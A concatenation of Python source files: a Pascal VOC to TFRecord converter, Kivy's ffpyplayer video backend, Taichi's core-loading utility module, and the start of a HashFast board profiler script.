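      'image/height': tf.FixedLenFeature([1], tf.int64),
      'image/width': tf.FixedLenFeature([1], tf.int64),
      'image/encoded': tf.FixedLenFeature([], tf.string),
      'image/object/bbox/xmin': tf.VarLenFeature(tf.float32),
      'image/object/bbox/xmax': tf.VarLenFeature(tf.float32),
      'image/object/bbox/ymin': tf.VarLenFeature(tf.float32),
      'image/object/bbox/ymax': tf.VarLenFeature(tf.float32),
      'image/object/bbox/label': tf.VarLenFeature(tf.int64),
  }
  parsed = tf.parse_single_example(serialized_example, features)
  # decode the JPEG bytes back into an HxWx3 uint8 tensor
  image = tf.image.decode_jpeg(parsed['image/encoded'], channels=3)
  return image, parsed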
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _find_image_bounding_boxes(directory, cur_record):
"""Find the bounding boxes for a given image file.
Args:
    directory: string; the path of all data.
cur_record: list of strings; the first of which is the sub-directory of cur_record, the second is the image filename.
Returns:
bboxes: List of bounding boxes for each image.
labels: List of labels for bounding box.
labels_text: List of labels' name for bounding box.
    difficult: List of ints indicating the difficulty of that bounding box.
    truncated: List of ints indicating the truncation of that bounding box.
Notes:
directory is just the input dir
e.g. '.'
cur_record is a tuple containing the current record folder and current record image
e.g. ('VOC2012', '2012_002167.jpg')
"""
anna_file = os.path.join(directory, cur_record[0], 'Annotations', cur_record[1].replace('jpg', 'xml'))
tree = xml_tree.parse(anna_file)
root = tree.getroot()
# Image shape.
size = root.find('size')
shape = [int(size.find('height').text),
int(size.find('width').text),
int(size.find('depth').text)]
# Find annotations.
bboxes = []
labels = []
labels_text = []
difficult = []
truncated = []
num_classes = len(dataset_common.VOC_LABELS_reduced)
for obj in root.findall('object'):
label = obj.find('name').text
if label in dataset_common.VOC_LABELS_reduced:
label_id = int(dataset_common.VOC_LABELS_reduced[label][0])
label_text = label.encode('ascii')
else:
label_id = num_classes
label_text = 'background'.encode('ascii')
labels.append(label_id)
labels_text.append(label_text)
isdifficult = obj.find('difficult')
if isdifficult is not None:
difficult.append(int(isdifficult.text))
else:
difficult.append(0)
istruncated = obj.find('truncated')
if istruncated is not None:
truncated.append(int(istruncated.text))
else:
truncated.append(0)
bbox = obj.find('bndbox')
bboxes.append((float(bbox.find('ymin').text) / shape[0],
float(bbox.find('xmin').text) / shape[1],
float(bbox.find('ymax').text) / shape[0],
float(bbox.find('xmax').text) / shape[1]
))
return bboxes, labels, labels_text, difficult, truncated
def _process_image_files_batch(coder, thread_index, ranges, name, directory, all_records, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
    thread_index: integer, unique batch index to run; it lies within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
    directory: string; the path of all data
all_records: list of string tuples; the first of each tuple is the sub-directory of the record, the second is the image filename.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
cur_record = all_records[i]
filename = os.path.join(directory, cur_record[0], 'JPEGImages', cur_record[1])
bboxes, labels, labels_text, difficult, truncated = _find_image_bounding_boxes(directory, cur_record)
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, cur_record[1], image_buffer, bboxes, labels, labels_text,
difficult, truncated, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, directory, all_records, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
    directory: string; the path of all data
all_records: list of string tuples; the first of each tuple is the sub-directory of the record, the second is the image filename.
num_shards: integer number of shards for this data set.
"""
  # Break all images into batches, each covering the half-open range [ranges[i][0], ranges[i][1]).
spacing = np.linspace(0, len(all_records), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, directory, all_records, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(all_records)))
sys.stdout.flush()
def _process_dataset(name, directory, all_splits, num_shards):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
all_splits: list of strings, sub-path to the data set.
num_shards: integer number of shards for this data set.
"""
all_records = []
for split in all_splits:
main_path = os.path.join(directory, split, 'ImageSets/Main')
jpeg_lst = []
for cls in dataset_common.VOC_LABELS_reduced:
if cls not in ['none', 'background']:
if "test" in split.lower():
cls_im_lst = os.path.join(main_path, cls + '_test.txt')
else:
cls_im_lst = os.path.join(main_path, cls + '_trainval.txt')
        with open(cls_im_lst, 'r') as f:
          for line in f:
            if line.split(" ")[0] + ".jpg" not in jpeg_lst:
              jpeg_lst.append(line.split(" ")[0] + ".jpg")
jpegs = [im_name for im_name in jpeg_lst if im_name.strip()[-3:]=='jpg']
all_records.extend(list(zip([split] * len(jpegs), jpegs)))
shuffled_index = list(range(len(all_records)))
random.seed(RANDOM_SEED)
random.shuffle(shuffled_index)
all_records = [all_records[i] for i in shuffled_index]
_process_image_files(name, directory, all_records, num_shards)
def parse_comma_list(args):
return [s.strip() for s in args.split(',')]
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('val', FLAGS.dataset_directory, parse_comma_list(FLAGS.validation_splits), FLAGS.validation_shards)
_process_dataset('train', FLAGS.dataset_directory, parse_comma_list(FLAGS.train_splits), FLAGS.train_shards)
if __name__ == '__main__':
tf.app.run()
|
video_ffpyplayer.py
|
'''
FFmpeg based video abstraction
==============================
To use, you need to install ffpyplayer and have a compiled ffmpeg shared
library.
https://github.com/matham/ffpyplayer
The docs there describe how to set this up. But briefly, first you need to
compile ffmpeg using the shared flags while disabling the static flags (you'll
probably have to set the fPIC flag, e.g. CFLAGS=-fPIC). Here are some
instructions: https://trac.ffmpeg.org/wiki/CompilationGuide. For Windows, you
can download compiled GPL binaries from http://ffmpeg.zeranoe.com/builds/.
Similarly, you should download SDL2.
Now, you should have ffmpeg and sdl directories. In each, you should have an
'include', 'bin' and 'lib' directory, where e.g. for Windows, 'lib' contains
the .dll.a files, while 'bin' contains the actual dlls. The 'include' directory
holds the headers. The 'bin' directory is only needed if the shared libraries
are not already in the path. In the environment, define FFMPEG_ROOT and
SDL_ROOT, each pointing to the ffmpeg and SDL directories respectively. (If
you're using SDL2, the 'include' directory will contain an 'SDL2' directory,
which then holds the headers).
Once defined, download the ffpyplayer git repo and run
python setup.py build_ext --inplace
Finally, before running you need to ensure that ffpyplayer is in python's path.
.. Note::
    When kivy exits by closing the window while the video is playing,
    it appears that the __del__ method of VideoFFPy
    is not called. Because of this, the VideoFFPy object is not
    properly deleted when kivy exits. The consequence is that because
    MediaPlayer creates internal threads which do not have their daemon
    flag set, when the main thread exits, it'll hang and wait for the other
    MediaPlayer threads to exit. But since __del__ is not called to delete the
    MediaPlayer object, those threads will remain alive, hanging kivy. What
    this means is that you have to be sure to delete the MediaPlayer object
    before kivy exits by setting it to None.
'''
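# A minimal usage sketch (assumes a running Kivy app and a valid video file; the
# filename below is a placeholder, not something provided by this module):
#
#     video = VideoFFPy(filename='movie.mp4', eos='stop')
#     video.play()
#     ...
#     video.unload()   # tears down the MediaPlayer threads before the app exits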
__all__ = ('VideoFFPy', )
try:
import ffpyplayer
from ffpyplayer.player import MediaPlayer
from ffpyplayer.tools import set_log_callback, get_log_callback
except:
raise
from threading import Thread
from kivy.clock import Clock, mainthread
from kivy.logger import Logger
from kivy.core.video import VideoBase
from kivy.graphics import Rectangle, BindTexture
from kivy.graphics.texture import Texture
from kivy.graphics.fbo import Fbo
from kivy.weakmethod import WeakMethod
import time
Logger.info('VideoFFPy: Using ffpyplayer {}'.format(ffpyplayer.version))
logger_func = {'quiet': Logger.critical, 'panic': Logger.critical,
'fatal': Logger.critical, 'error': Logger.error,
'warning': Logger.warning, 'info': Logger.info,
'verbose': Logger.debug, 'debug': Logger.debug}
def _log_callback(message, level):
message = message.strip()
if message:
logger_func[level]('ffpyplayer: {}'.format(message))
if not get_log_callback():
set_log_callback(_log_callback)
class VideoFFPy(VideoBase):
YUV_RGB_FS = """
$HEADER$
uniform sampler2D tex_y;
uniform sampler2D tex_u;
uniform sampler2D tex_v;
void main(void) {
float y = texture2D(tex_y, tex_coord0).r;
float u = texture2D(tex_u, tex_coord0).r - 0.5;
float v = texture2D(tex_v, tex_coord0).r - 0.5;
float r = y + 1.402 * v;
float g = y - 0.344 * u - 0.714 * v;
float b = y + 1.772 * u;
gl_FragColor = vec4(r, g, b, 1.0);
}
"""
_trigger = None
def __init__(self, **kwargs):
self._ffplayer = None
self._thread = None
self._next_frame = None
self._seek_queue = []
self._ffplayer_need_quit = False
self._trigger = Clock.create_trigger(self._redraw)
super(VideoFFPy, self).__init__(**kwargs)
def __del__(self):
self.unload()
def _player_callback(self, selector, value):
if self._ffplayer is None:
return
if selector == 'quit':
def close(*args):
self.unload()
Clock.schedule_once(close, 0)
def _get_position(self):
if self._ffplayer is not None:
return self._ffplayer.get_pts()
return 0
def _set_position(self, pos):
self.seek(pos)
def _set_volume(self, volume):
self._volume = volume
if self._ffplayer:
self._ffplayer.set_volume(self._volume)
def _get_duration(self):
if self._ffplayer is None:
return 0
return self._ffplayer.get_metadata()['duration']
@mainthread
def _do_eos(self):
if self.eos == 'pause':
self.pause()
elif self.eos == 'stop':
self.stop()
elif self.eos == 'loop':
self.position = 0
self.dispatch('on_eos')
@mainthread
def _change_state(self, state):
self._state = state
def _redraw(self, *args):
if not self._ffplayer:
return
next_frame = self._next_frame
if not next_frame:
return
img, pts = next_frame
if img.get_size() != self._size or self._texture is None:
self._size = w, h = img.get_size()
if self._out_fmt == 'yuv420p':
w2 = int(w / 2)
h2 = int(h / 2)
self._tex_y = Texture.create(
size=(w, h), colorfmt='luminance')
self._tex_u = Texture.create(
size=(w2, h2), colorfmt='luminance')
self._tex_v = Texture.create(
size=(w2, h2), colorfmt='luminance')
self._fbo = fbo = Fbo(size=self._size)
with fbo:
BindTexture(texture=self._tex_u, index=1)
BindTexture(texture=self._tex_v, index=2)
Rectangle(size=fbo.size, texture=self._tex_y)
fbo.shader.fs = VideoFFPy.YUV_RGB_FS
fbo['tex_y'] = 0
fbo['tex_u'] = 1
fbo['tex_v'] = 2
self._texture = fbo.texture
else:
self._texture = Texture.create(size=self._size,
colorfmt='rgba')
# XXX FIXME
# self.texture.add_reload_observer(self.reload_buffer)
self._texture.flip_vertical()
self.dispatch('on_load')
if self._texture:
if self._out_fmt == 'yuv420p':
dy, du, dv, _ = img.to_memoryview()
if dy and du and dv:
self._tex_y.blit_buffer(dy, colorfmt='luminance')
self._tex_u.blit_buffer(du, colorfmt='luminance')
self._tex_v.blit_buffer(dv, colorfmt='luminance')
self._fbo.ask_update()
self._fbo.draw()
else:
self._texture.blit_buffer(
img.to_memoryview()[0], colorfmt='rgba')
self.dispatch('on_frame')
def _next_frame_run(self):
ffplayer = self._ffplayer
sleep = time.sleep
trigger = self._trigger
did_dispatch_eof = False
seek_queue = self._seek_queue
# fast path, if the source video is yuv420p, we'll use a glsl shader
# for buffer conversion to rgba
while not self._ffplayer_need_quit:
src_pix_fmt = ffplayer.get_metadata().get('src_pix_fmt')
if not src_pix_fmt:
sleep(0.005)
continue
if src_pix_fmt == 'yuv420p':
self._out_fmt = 'yuv420p'
ffplayer.set_output_pix_fmt(self._out_fmt)
self._ffplayer.toggle_pause()
break
if self._ffplayer_need_quit:
return
# wait until loaded or failed, shouldn't take long, but just to make
# sure metadata is available.
        s = time.perf_counter()  # time.clock() was removed in Python 3.8; perf_counter measures the elapsed interval here
while not self._ffplayer_need_quit:
if ffplayer.get_metadata()['src_vid_size'] != (0, 0):
break
            # XXX what if it fails later, then?
            if time.perf_counter() - s > 10.:
break
sleep(0.005)
if self._ffplayer_need_quit:
return
        # we got all the information, now get the frames :)
self._change_state('playing')
while not self._ffplayer_need_quit:
seek_happened = False
if seek_queue:
vals = seek_queue[:]
del seek_queue[:len(vals)]
percent, precise = vals[-1]
ffplayer.seek(
percent * ffplayer.get_metadata()['duration'],
relative=False,
accurate=precise
)
seek_happened = True
self._next_frame = None
# Get next frame if paused:
if seek_happened and ffplayer.get_pause():
ffplayer.set_volume(0.0) # Try to do it silently.
ffplayer.set_pause(False)
try:
                    # We don't know the concrete number of frames to skip;
                    # this number worked fine on a couple of tested videos:
to_skip = 6
while True:
frame, val = ffplayer.get_frame(show=False)
# Exit loop on invalid val:
if val in ('paused', 'eof'):
break
# Exit loop on seek_queue updated:
if seek_queue:
break
# Wait for next frame:
if frame is None:
sleep(0.005)
continue
# Wait until we skipped enough frames:
to_skip -= 1
if to_skip == 0:
break
# Assuming last frame is actual, just get it:
frame, val = ffplayer.get_frame(force_refresh=True)
finally:
ffplayer.set_pause(bool(self._state == 'paused'))
ffplayer.set_volume(self._volume)
# Get next frame regular:
else:
frame, val = ffplayer.get_frame()
if val == 'eof':
sleep(0.2)
if not did_dispatch_eof:
self._do_eos()
did_dispatch_eof = True
elif val == 'paused':
did_dispatch_eof = False
sleep(0.2)
else:
did_dispatch_eof = False
if frame:
self._next_frame = frame
trigger()
else:
val = val if val else (1 / 30.)
sleep(val)
def seek(self, percent, precise=True):
if self._ffplayer is None:
return
self._seek_queue.append((percent, precise,))
def stop(self):
self.unload()
def pause(self):
if self._ffplayer and self._state != 'paused':
self._ffplayer.toggle_pause()
self._state = 'paused'
def play(self):
if self._ffplayer and self._state == 'paused':
self._ffplayer.toggle_pause()
self._state = 'playing'
return
self.load()
self._out_fmt = 'rgba'
ff_opts = {
'paused': True,
'out_fmt': self._out_fmt,
'sn': True,
'volume': self._volume,
}
self._ffplayer = MediaPlayer(
self._filename, callback=self._player_callback,
thread_lib='SDL',
loglevel='info', ff_opts=ff_opts)
# Disabled as an attempt to fix kivy issue #6210
# self._ffplayer.set_volume(self._volume)
self._thread = Thread(target=self._next_frame_run, name='Next frame')
self._thread.daemon = True
self._thread.start()
def load(self):
self.unload()
def unload(self):
if self._trigger is not None:
self._trigger.cancel()
self._ffplayer_need_quit = True
if self._thread:
self._thread.join()
self._thread = None
if self._ffplayer:
self._ffplayer = None
self._next_frame = None
self._size = (0, 0)
self._state = ''
self._ffplayer_need_quit = False
|
util.py
|
import os
import re
import shutil
import sys
import ctypes
from pathlib import Path
from colorama import Fore, Back, Style
from .settings import *
if sys.version_info < (3, 6):
raise RuntimeError(
"\nPlease restart with Python 3.6+\n" + "Current Python version:",
sys.version_info)
ti_core = None
def in_docker():
if os.environ.get("TI_IN_DOCKER", "") == "":
return False
else:
return True
def import_ti_core(tmp_dir=None):
global ti_core
if get_os_name() != 'win':
old_flags = sys.getdlopenflags()
sys.setdlopenflags(2 | 8) # RTLD_NOW | RTLD_DEEPBIND
else:
pyddir = os.path.join(package_root(), 'lib')
os.environ['PATH'] += ';' + pyddir
try:
import taichi_core as core
except Exception as e:
if isinstance(e, ImportError):
print(
Fore.YELLOW + "Share object taichi_core import failed, "
"check this page for possible solutions:\n"
"https://taichi.readthedocs.io/en/stable/install.html#troubleshooting"
+ Fore.RESET)
if get_os_name() == 'win':
e.msg += '\nConsider installing Microsoft Visual C++ Redistributable: https://aka.ms/vs/16/release/vc_redist.x64.exe'
elif get_os_name() == 'linux':
e.msg += '\nConsider installing libtinfo5: sudo apt-get install libtinfo5'
raise e from None
ti_core = core
if get_os_name() != 'win':
sys.setdlopenflags(old_flags)
lib_dir = os.path.join(package_root(), 'lib')
core.set_lib_dir(locale_encode(lib_dir))
if tmp_dir is not None:
core.set_tmp_dir(locale_encode(tmp_dir))
def locale_encode(path):
try:
import locale
return path.encode(locale.getdefaultlocale()[1])
except:
try:
import sys
return path.encode(sys.getfilesystemencoding())
except:
try:
return path.encode()
except:
return path
def is_ci():
return os.environ.get('TI_CI', '') == '1'
def package_root():
return os.path.join(os.path.dirname(os.path.realpath(__file__)), '../')
def is_release():
return os.environ.get('TAICHI_REPO_DIR', '') == ''
def get_core_shared_object():
if is_release():
directory = os.path.join(package_root(), 'lib')
else:
directory = get_bin_directory()
return os.path.join(directory, 'libtaichi_core.so')
def get_repo():
from git import Repo
repo = Repo(get_repo_directory())
return repo
def print_red_bold(*args, **kwargs):
print(Fore.RED + Style.BRIGHT, end='')
print(*args, **kwargs)
print(Style.RESET_ALL, end='')
create_sand_box_on_windows = True
def build():
tmp_cwd = os.getcwd()
bin_dir = get_build_directory()
try:
os.mkdir(bin_dir)
except:
pass
os.chdir(bin_dir)
import multiprocessing
print('Building taichi...')
num_make_threads = min(20, multiprocessing.cpu_count())
if get_os_name() == 'win':
make_ret = os.system(
"msbuild /p:Configuration=Release /p:Platform=x64 /m taichi.sln")
else:
make_ret = os.system('make -j {}'.format(num_make_threads))
if make_ret != 0:
print(' Error: Build failed.')
exit(-1)
os.chdir(tmp_cwd)
def check_exists(src):
if not os.path.exists(src):
raise FileNotFoundError(
            f'File "{src}" does not exist. Installation corrupted or build incomplete?'
)
def prepare_sandbox():
'''
Returns a temporary directory, which will be automatically deleted on exit.
It may contain the taichi_core shared object or some misc. files.
'''
import atexit
import shutil
from tempfile import mkdtemp
tmp_dir = mkdtemp(prefix='taichi-')
atexit.register(shutil.rmtree, tmp_dir)
print(f'[Taichi] preparing sandbox at {tmp_dir}')
os.mkdir(os.path.join(tmp_dir, 'runtime/'))
return tmp_dir
def get_unique_task_id():
import datetime
import random
return datetime.datetime.now().strftime('task-%Y-%m-%d-%H-%M-%S-r') + (
'%05d' % random.randint(0, 10000))
if is_release():
print("[Taichi] mode=release")
sys.path.append(os.path.join(package_root(), 'lib'))
if get_os_name() != 'win':
link_src = os.path.join(package_root(), 'lib', 'taichi_core.so')
link_dst = os.path.join(package_root(), 'lib', 'libtaichi_core.so')
# For llvm jit to find the runtime symbols
if not os.path.exists(link_dst):
os.symlink(link_src, link_dst)
import_ti_core()
if get_os_name() != 'win':
dll = ctypes.CDLL(get_core_shared_object(), mode=ctypes.RTLD_LOCAL)
# The C backend needs a temporary directory for the generated .c and compiled .so files:
ti_core.set_tmp_dir(locale_encode(prepare_sandbox(
))) # TODO: always allocate a tmp_dir for all situations
ti_core.set_python_package_dir(package_root())
os.makedirs(ti_core.get_repo_dir(), exist_ok=True)
else:
print("[Taichi] mode=development")
if get_os_name() == 'osx':
bin_dir = get_bin_directory()
os.environ['DYLD_FALLBACK_LIBRARY_PATH'] = get_runtime_directory()
lib_path = os.path.join(bin_dir, 'libtaichi_core.dylib')
tmp_cwd = os.getcwd()
tmp_dir = prepare_sandbox()
check_exists(lib_path)
shutil.copy(lib_path, os.path.join(tmp_dir, 'taichi_core.so'))
os.chdir(tmp_dir)
sys.path.append(tmp_dir)
import taichi_core as ti_core
os.chdir(tmp_cwd)
# TODO: unify importing infrastructure:
elif get_os_name() == 'linux':
bin_dir = get_bin_directory()
if 'LD_LIBRARY_PATH' in os.environ:
os.environ['LD_LIBRARY_PATH'] += ':/usr/lib64/'
else:
os.environ['LD_LIBRARY_PATH'] = '/usr/lib64/'
lib_path = os.path.join(bin_dir, 'libtaichi_core.so')
check_exists(lib_path)
tmp_cwd = os.getcwd()
tmp_dir = prepare_sandbox()
check_exists(lib_path)
shutil.copy(lib_path, os.path.join(tmp_dir, 'taichi_core.so'))
os.chdir(tmp_dir)
sys.path.append(tmp_dir)
try:
import_ti_core(tmp_dir)
except Exception as e:
from colorama import Fore, Back, Style
print_red_bold("Taichi core import failed: ", end='')
print(e)
print(
Fore.YELLOW + "check this page for possible solutions:\n"
"https://taichi.readthedocs.io/en/stable/install.html#troubleshooting"
+ Fore.RESET)
raise e from None
os.chdir(tmp_cwd)
elif get_os_name() == 'win':
bin_dir = get_bin_directory()
dll_path_invalid = os.path.join(bin_dir, 'libtaichi_core.dll')
assert not os.path.exists(dll_path_invalid)
possible_folders = ['Debug', 'RelWithDebInfo', 'Release']
detected_dlls = []
for folder in possible_folders:
dll_path = os.path.join(bin_dir, folder, 'taichi_core.dll')
if os.path.exists(dll_path):
detected_dlls.append(dll_path)
if len(detected_dlls) == 0:
raise FileNotFoundError(
f'Cannot find Taichi core dll under {get_bin_directory()}/{possible_folders}'
)
elif len(detected_dlls) != 1:
print('Warning: multiple Taichi core dlls found:')
for dll in detected_dlls:
print(' ', dll)
print(f'Using {detected_dlls[0]}')
dll_path = detected_dlls[0]
        # On Windows, once a dll/pyd is loaded we cannot write to it any more
old_wd = os.getcwd()
os.chdir(bin_dir)
if create_sand_box_on_windows:
# Create a sandbox for separated core lib development and loading
folder = os.path.join(get_output_directory(), 'tmp',
get_unique_task_id())
lib_dir = os.path.join(get_repo_directory(), 'external', 'lib')
os.environ['PATH'] += ';' + lib_dir
os.makedirs(folder)
shutil.copy(dll_path, os.path.join(folder, 'taichi_core.pyd'))
os.environ['PATH'] += ';' + folder
sys.path.append(folder)
else:
shutil.copy(dll_path, os.path.join(bin_dir, 'taichi_core.pyd'))
sys.path.append(bin_dir)
try:
import taichi_core as ti_core
except Exception as e:
print(e)
print()
print(
'Hint: please make sure the major and minor versions of the Python executable is correct.'
)
print()
raise e
os.chdir(old_wd)
log_level = os.environ.get('TI_LOG_LEVEL', '')
if log_level:
ti_core.set_logging_level(log_level)
def get_dll_name(name):
if get_os_name() == 'linux':
return 'libtaichi_%s.so' % name
elif get_os_name() == 'osx':
return 'libtaichi_%s.dylib' % name
elif get_os_name() == 'win':
return 'taichi_%s.dll' % name
else:
raise Exception(f"Unknown OS: {get_os_name()}")
def load_module(name, verbose=True):
if verbose:
print('Loading module', name)
try:
if get_os_name() == 'osx':
mode = ctypes.RTLD_LOCAL
else:
mode = ctypes.RTLD_GLOBAL
if '.so' in name:
ctypes.PyDLL(name, mode=mode)
else:
ctypes.PyDLL(os.path.join(get_repo_directory(), 'build',
get_dll_name(name)),
mode=mode)
except Exception as e:
print(Fore.YELLOW +
"Warning: module [{}] loading failed: {}".format(name, e) +
Style.RESET_ALL)
def at_startup():
if not is_release():
output_dir = get_output_directory()
if not os.path.exists(output_dir):
print('Making output directory')
os.mkdir(output_dir)
ti_core.set_core_state_python_imported(True)
def start_memory_monitoring(output_fn, pid=-1, interval=1):
# removing dependency on psutil
return
import os, psutil, time
if pid == -1:
pid = os.getpid()
import multiprocessing
def task():
with open(output_fn, 'w') as f:
process = psutil.Process(pid)
while True:
try:
mem = process.memory_info().rss
except:
mem = -1
time.sleep(interval)
print(time.time(), mem, file=f)
f.flush()
proc = multiprocessing.Process(target=task, daemon=True)
proc.start()
def require_version(major, minor=None, patch=None):
    # treat an omitted minor/patch as 0 so the comparison below does not fail on None
    minor = minor if minor is not None else 0
    patch = patch if patch is not None else 0
    versions = [
        int(ti_core.get_version_major()),
        int(ti_core.get_version_minor()),
        int(ti_core.get_version_patch()),
    ]
    match = major == versions[0] and (
        minor < versions[1] or minor == versions[1] and patch <= versions[2])
if match:
return
else:
print("Taichi version mismatch. required >= {}.{}.{}".format(
major, minor, patch))
print("Installed =", ti_core.get_version_string())
raise Exception("Taichi version mismatch")
at_startup()
def _print_taichi_header():
dev_mode = not is_release()
header = '[Taichi] '
if dev_mode:
header += '<dev mode>, '
else:
header += f'version {ti_core.get_version_string()}, '
llvm_version = ti_core.get_llvm_version_string()
header += f'llvm {llvm_version}, '
commit_hash = ti_core.get_commit_hash()
commit_hash = commit_hash[:8]
header += f'commit {commit_hash}, '
header += f'{get_os_name()}, '
py_ver = '.'.join(str(x) for x in sys.version_info[:3])
header += f'python {py_ver}'
print(header)
_print_taichi_header()
__all__ = [
'ti_core',
'build',
'load_module',
'start_memory_monitoring',
'is_release',
'package_root',
'require_version',
]
|
profiler.py
|
#! /usr/bin/env python3
# Copyright (c) 2014, HashFast Technologies LLC
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of HashFast Technologies LLC nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL HASHFAST TECHNOLOGIES LLC BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse
def parse_args():
parser = argparse.ArgumentParser(description='Profile HashFast boards in order to find optimal operating points.')
parser.add_argument('-r', '--revision', dest='revision', type=int, default=3, help='HashFast board major revision number')
return parser.parse_args()
if __name__ == '__main__':
# parse args before other imports
args = parse_args()
    if args.revision == 3:
FRQ_MIN = 925
VLT_MIN = 900
else:
FRQ_MIN = 500
VLT_MIN = 720
# frequency steps
FRQ_STEP = 25
# voltage steps
VLT_STEP = 5
import sys
import time
import threading
import csv
from collections import OrderedDict
from abc import ABCMeta, abstractmethod
from datetime import datetime
from hf.ui.base import BaseUI
from hf.load import hf
from hf.load import talkusb
from hf.load.routines import settings
from hf.load.routines import thermal
from hf.usb import usbbulk
from hf.usb import usbctrl
fn = OrderedDict([('die',None),('frequency',None),('voltage',None),('hashrate',None),('hashes',None),('jobs',None),('nonces',None),
('lhw',None),('dhw',None),('chw',None),('temperature',None),('core_voltage',None),('thermal_cutoff',None),('elapsed',None)])
class HFProfilerData:
def __init__(self):
pass
